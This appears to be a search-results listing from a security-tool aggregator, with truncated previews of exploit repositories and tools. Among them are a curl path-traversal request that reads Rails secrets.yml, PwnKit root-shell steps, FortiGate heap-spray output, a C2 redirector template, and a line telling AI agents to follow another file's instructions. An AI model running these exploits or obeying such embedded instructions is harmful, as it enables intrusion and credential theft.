2091306 matches found
CVE-2020-11651
CVE-2020-11651 CVE-2020-11651 的 PoC 需要 Python3,已在 3.8 上测试 python3.8 -m pip install pyzmq msgpack root@kitploit: ⇒ python3.8 poc.py -h usage: poc.py -h -p PORT -c CMD -k -m -r READ -w WRITE -f FILE server server ... Exploit CVE-2020-11651 positional arguments: server Target Server IP or Host...
CVE-2021-4034
CVE-2021-4034 Exploit de escalada de privilegios en polkit Solo ejecuta make, ./cve-2021-4034 y disfruta de tu shell de root. PoC Si el exploit funciona, obtendrás una shell de root inmediatamente: root@kitploit: vagrant@ubuntu-impish:/CVE-2021-4034$ make cc -Wall --shared -fPIC -o pwnkit.so...
CVE-2023-48842
CVE-2023-48842 来源 : 发现 D-Link Go-RT-AC750 revAv101b03 通过 hedwig.cgi 的 service 参数存在命令注入漏洞。 https://drive.google.com/file/d/1y5omf2SAhNmcPqDxCSRTvJVAWwPcH/view 小升级 : 我更新了脚本,现在它变得更强大了。脚本接受 ip:port 列表(如果未提供端口,则只接受 ip),使用多线程(Tren 效果 :D),并且仅输出有效的凭据。 免责声明 : 仅供教育用途...
osquery
osquery osquery 是一个基于 SQL 的操作系统检测、监控和分析框架。 支持 Linux、macOS 和 Windows。 信息和资源 主页:osquery.io 下载:osquery.io/downloads 文档:ReadTheDocs Stack Overflow:Stack Overflow 问题 表结构:osquery.io/schema Slack:浏览存档 或 加入对话 构建状态: CII 最佳实践: 什么是 osquery? osquery 将操作系统暴露为一个高性能的关系型数据库。这允许你编写基于 SQL 的查询来探索操作系统数据。通过 osquery,S...
flask_pythonanywhere_redirector
flaskpythonanywhereredirector flask pythonanywhere C2 redirector template Setup 1. Goto: https://www.pythonanywhere.com/ 2. Web Tab - Add new web app - Flask - Python2.7 - next.. 3. scroll down to code - Go to directory - Flaskapp.py 4. Copy and paste code from app.py to file - save top right 5...
Weblate-CVE-2026-24126
Weblate — Arbitrary File Read via SSH Host Argument Injection Discovered by: Alejandro Baño · January 2026 Acknowledged by: Weblate 5.16 release notes Overview Weblate's SSH host key management endpoint passes the host parameter supplied by an authenticated administrator directly tossh-keyscan...
f5-waf-enforce-sig-CVE-2021-44228
f5-waf-enforce-sigs-CVE-2021-44228 此脚本在 BIG-IP ASM 设备的所有策略中强制执行针对 CVE-2021-44228 的签名。 概述 该脚本在 Adv. WAF/ASM 中,将所有策略中以下与 CVE-2021-44228 相关的签名强制设置为阻断模式。 sigs = '200104768', '200104769', '200004450', '200004451','200004474','200104770','200104771' https://support.f5.com/csp/article/K19026212 该脚本已在...
reverse-skill
reverse-skill Cybersecurity Skills Router · 逆向技能路由包 Navigate the dark waters, sail against the stream. About · Getting Started · Usage · Fast route · Routing · Ops contracts · AI Bootstrap · Sponsors · Contributing 🌐 中文 About If you are an AI Agent, jump toREADMEAI.md and follow the instructions...
rails-rce-cve-2016-0752
利用 CVE-2016-0752 此应用作为利用 CVE-2016-0752 的易受攻击的概念验证。更多信息请参阅这篇博客文章,其中解释了该漏洞、利用所需步骤、修复方法以及一个 Metasploit 模块的链接。 快速开始 root@kitploit: echo "" log/development.log Clear out the log file rvm use 2.2.3 bundle rails s 漏洞 URL: http://localhost/users/dashboard...
social-analyzer
Social Analyzer - API, CLI, and Web App for analyzing & finding a person's profile across +1000 social media \ websites. It includes different analysis and detection modules, and you can choose which modules to use during the investigation process. The detection modules utilize a rating mechanism...
CVE-2023-27997
CVE-2023-27997 FortiGate VM64 7.2.0 可被此代码利用。(注意:代码编写方式非常愚蠢。) 概念验证 root@kitploit: $ python3 exploit.py 192.168.106.142 10443 192.168.106.143 9999 + generating shellcode + salt=b'25c2dcf2' + processing hash + finding hash in cache - not in cache + computing + loading + heap spray + execute...
awesome-osint
Awesome OSINT A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence OSINT is intelligence collected from publicly available sources. In the intelligence community IC, the term "open" refers to overt, publicly available sources as opposed to...
CVE-2016-10140-Zoneminder-Poc
ZoneMinder Unauthorized Access CVE-2016-10140 Poc -- Batch Verification Script Vulnerability Description ZoneMinder is an open-source video surveillance system. When abnormal events occur, you can receive email or SMS notifications. There is an information disclosure and authentication bypass...
CVE-2018-3760
CVE-2018-3760 Rails Asset Pipeline 目录遍历漏洞 由 Orange Tsai 发现 注意 :默认情况下,以生产模式运行的 Rails 应用不受此漏洞影响。 漏洞利用: root@kitploit: curl -v http://127.0.0.1:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/config/secrets.yml%3ftype=text/yaml 安全分析...
freebsd-dirent-info-leak-bugs
How did I find the bugs? 1. Randomly decide to audit the filesystems in FreeBSD 2. Do some research and find that the default filesystem in use is a combination of FFS and UFS 3. Spend some time auditing ufscreate and find 0 bugs 4. Go here and look through the commit history for the UFS file...
s2-067-CVE-2024-53677
s2-067-CVE-2024-53677 s2-067CVE-2024-53677 摘要 文件上传逻辑存在缺陷,允许攻击者启用路径遍历——与 S2-066 中报告的问题类似。 谁应阅读此内容 所有 Struts 2 开发者和用户 漏洞影响 远程代码执行 最高安全评级 严重 建议 升级到 Struts 6.4.0 或更高版本,并使用 Action File Upload Interceptor 受影响软件 Struts 2.0.0 - Struts 2.3.37 EOL, Struts 2.5.0 - Struts 2.5.33, Struts 6.0.0 - Struts 6.3.0....
CVE-2023-30145
描述: Camaleon CMS v2.7.0 被发现通过 formats 参数包含一个服务端模板注入(SSTI)漏洞。 受影响组件: 低于 2.7.0 的所有版本 修复版本: 修复版本:2.7.4 复现步骤: 检测: 1.打开以下 URL:https://target.com/admin/media/upload 2.上传任意文件并拦截请求,在 formats 参数值中添加此载荷并测试 testivuuvm,在响应中它将返回 77 的乘法结果以及以下消息:"File format not allowed dqopi49vuuvm" 利用: 3.之后,要执行命令,添加此载荷...
sdwan-scanner-CVE-2026-20127
Cisco SD-WAN Exposure Scanner CVE-2026-20127 A specialized passive fingerprinting tool designed to identify internet-facing Cisco SD-WAN vManage / Viptela instances. This tool helps security researchers and system administrators manage their external attack surface by detecting potentially expose...
CVE-2025-29927
CVE-2025-29927 Next.js 中间件绕过扫描器 CVE-2025-29927 CVE-2025-29927 是一款专门用于检测 Next.js 中间件绕过漏洞 CVE-2025-29927 的安全工具,该漏洞影响 Next.js 版本 11.1.4 至 15.2.2。这一严重漏洞允许攻击者通过发送特制的 HTTP 头来绕过安全控制。 关于漏洞 Next.js 中间件绕过漏洞 CVE-2025-29927 允许攻击者通过发送恶意 X-Middleware-Subrequest 头来绕过授权控制,该头会混淆中间件处理逻辑。这可能导致对受保护资源和路由的未授权访问。 CVSS...
CVE-2026-11119-Padding-Oracle-Attack-on-CBC-Mode-Encryption
CVE-2026-11119 – Padding Oracle Attack on CBC Mode Encryption Program Code Python root@kitploit: paddingoracleserver.py - Server that returns padding error from flask import Flask, request from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad import os key = os.urandom16 app =...